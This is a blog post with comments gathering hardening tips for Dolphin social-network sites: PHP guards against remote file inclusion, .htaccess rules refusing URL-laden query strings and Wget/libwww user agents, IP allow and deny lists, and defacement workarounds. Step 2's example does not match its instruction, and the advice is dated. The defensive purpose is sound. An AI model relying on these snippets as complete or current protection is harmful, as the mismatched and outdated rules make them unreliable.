At some point in your site's existence, there will be attempts that will be made to hack your site. I know several months ago there was a rash of Dolphin sites being compromised as hackers had intensely targetted the app.
Hackers have compromised sites like Facebook , MySpace, Twitter and I am sure many that has been or has yet to be reported. While you can't stop a hacker from trying to get to your site, you can definitely make it more work by applying some of the techniques listed below. I've rounded the first batch in this blog. This is a compilation of the ones I've found very helpful. There are others, I am sure, and if you have a link, please send it to me for inclusion.
SOURCE: sammie - http://www.boonex.com/unity/blog/entry/Fix_for_dolphin_exploit
1. Add the following to your ray/modules/global/inc/content.inc.php :
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
So that, when you're done it looks like this:
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
This prevents hackers from using any remote include files to used against your site.
2. Add the following to your /plugins/safehtml/HTMLSax3.php:
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
So when you're done, it looks like this:
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );
This prevents remotes access to your directories.
This will block remote files from being included in your remote files:
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
Block others from viewing your .htaccess files in a web browser:
yoursite.com/.htaccess (near the bottom add)
<Files .htaccess>
deny from all
</Files>
You can also deny ip addresses in single or in ranges:
<Files *>
order deny,allow
deny from 191.0.0.0
deny from 195.0.0.0
</Files>
<Files *>
deny from 124.187.
deny from 58.0.0.0/8
allow from 58.121.39.45
</Files>
SOURCE: Dialme.com
.htaccess files are recursive meaning that if you put one in a
directory all the subdirectories are effected. So in my media directory
I block ALL scripts like this:
That "limitexcept" blocks all "put" and "post" requests too. You CAN'T use this in a directory that has .php files inside it.. or any of the sub-dirs. But it SHOULD be inside ALL the /files directories for each ray widget, and the /media directory.
Sample locations:
yoursite.com/media/.htaccess
yoursite.com/ray/modules/movie/files/.htaccess
yoursite.com/ray/modules/mp3/files/.htaccess
yoursite.com/ray/modules/music/files/.htaccess
Code:
<LimitExcept GET>
Order deny,allow
deny from all
</LimitExcept>
<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|js.*|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>
SOURCE: Dialme.com
Let's make it so even if a hacker gets his credentials in your
database he STILL can't get in the admin... put this inside the
.htaccess that is in your /admin directory:
For example:
<Files *>
order deny,allow
deny from all
allow from 192.168.0.1
</Files>
The ip addresses listed will be allowed to access the admin.
This way even if someone gets YOUR password and login they STILL can't get inside the admin area.
*If your ip changes than this probably isn't the best solution. You will still be able to access ftp regardless of your ip address. This just blocks web access to your admin folder other than the 2 ip's specified. So even if your ip did change you can just ftp into your admin directory and update the ip's with your new ip addresses to allow.
Source: MakeASocialNetwork.com
Several of the hacking groups only do one thing when they DO get in..
they change your homepage to their logo (defacement). Just like #1 this
is automated.. they overwrite index.php or add one. Well what if your
homepage isn't index.php?? Even if their bot gets one in none of your
visitors will ever know :-) How? Simple, rename your index.php (in this
example myindex.php) and then put this in your .htaccess:
DirectoryIndex myindex.php
and inside the mod_rewrite block:
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/
RewriteRule ^index\.php$ http://www.yoursite.com/ [R=301,L]
So any request for http://www.yoursite.com/index.php will be directed
to http://www.yoursite.com/ and the new homepage is really myindex.php
If you do this then you need put a line setting it back to index.php
inside all the other directories (like admin and ray) OR change it in
them too.
Let them wrap their minds around why they got their bogus file in but it isn't showing :-)
Source: BoonexNerd.net
Add an index.php file in the root of a directory that you want to
access only if the person knows the exact URL. You can add the
following to the index.php file:
<?
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: http://www.boonexnerd.net" );
//exit(0); //jt note - in some cases you may need to uncomment this
out. To uncomment, delete the two forward slashes in front of exit(0)
?>
Source: BoonexNerd.net
Another way to redirect a curious user is by adding the following
to your .htacess file. The example below redirects traffic from my
Boonexnerd.com site over to my Boonexnerd.net site:
#-------------------------Redirect START --------------------------------------
#Apache Mod-Rewrite moduled must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www.boonexnerd.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
RewriteCond %{HTTP_HOST} ^boonexnerd.com/testredirect/ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------
Just replace my domain with yours. One question you may ask is, "Where do I put this thing?". Here's an example of placement:
Open your .htaccess file and add this to the file:
<IfModule mod_rewrite.c>
RewriteEngine on
#-------------------------Redirect START --------------------------------------
#Apache Mod-Rewrite moduled must be enabled in order for this redirec to work
RewriteCond %{HTTP_HOST} ^www.boonexnerd.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
RewriteCond %{HTTP_HOST} ^boonexnerd.com/testredirect/ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
</IfModule>
SOURCE: http://www.boonex.com/unity/forums/topic/Dolphin-not-secure-Hacked-.htm
gameutopia says:
First thing to do is to determine if register_globals is on or off. You can login to your admin panel first then visit:
yoursite.com/admin/phpinfo.php
Scroll down until you see register_globals
You should see to
columns local and master. Master is what you host has specified. And
local would be your site/directory. You can over ride your hosts master
value by using .htaccess on php apache servers or php.ini with cgi
servers.
The code varies slightly.
For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off
For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off
If you don't have php.ini make one with the above line and call it php.ini (cgi-servers only)
Else ask your host for certain and/or exact location to put php.ini
Go back to yoursite.com/admin/phpinfo.php and refresh page to verify the changes were successful ie...register_globals changed from on to off for certain in the local value, but if both local and master change that is ok too.
Keep your files healthy. Have a look at some of these FREE Antivirus Programs
http://www.avast.com/eng/download-avast-home.html
http://www.free-av.com/
http://www.wizcrafts.net/chinese-blocklist.html
This will list ip addresses for blocking.
http://www.wizcrafts.net/exploited-servers-blocklist.html
This will list exploited servers.
http://www.changedetection.com/
This will monitor your site
And this one is not necessarily a direct defense against hackers but services that will alert you if something has gone wrong with your site. These services will keep an eye on your site and will ping and xing your site based on intervals and will report any weirdness that may have occurred.
http://www.montastic.com/
http://mon.itor.us/
http://site24x7.com/
The last one on the list I've used and will also monitor if the content on your site has changed. For example, if the front page got defaced.
So there you have it, some of the fixes and updates that you may want to add to your own files in order to harden your site just a bit.
And finally, I have a daily list of ip addresses that have attempted to compromise my nerd site. If you are interested in getting the list please let me know. I will send you a daily/weekly report of suspected hackers based on my own server being attacked.
...sip...
Truly valuable and beneficial post. Thank you.
I am very interested in receiving the list of suspected hackers. How do I block the hackers once I have the list? Do I plug them into the Dolphin Root .htaccess mentioned above and are there other places to possibly block them?
Duh?
Juker
Thanks to you and everyone who chimed in. Here's a sample .htaccess file that shows placement of the deny ip addresses:
http://www.boonexnerd.net/dolphin/htaccessSample.txt
In terms of the list, I've used the list from http://www.wizcrafts.net/. I am also making my own list to share with those who want it. It will be a page where you can download the ip addresses who have attempted to hack my site.
...sip...
When I find useful information I will bookmark it and then take note of the parts that were important.
The reality is I just put it together...he he hee... Much of the credit really goes to the ones who actually wrote the info.
...sip...
The best way to stop all (or almost all) unwanted spam and similar bots is (if you host on your own server) to use iptables ( linux iptables=firewal) and a script for auto updating blacklist.
If someone is intrested I can help....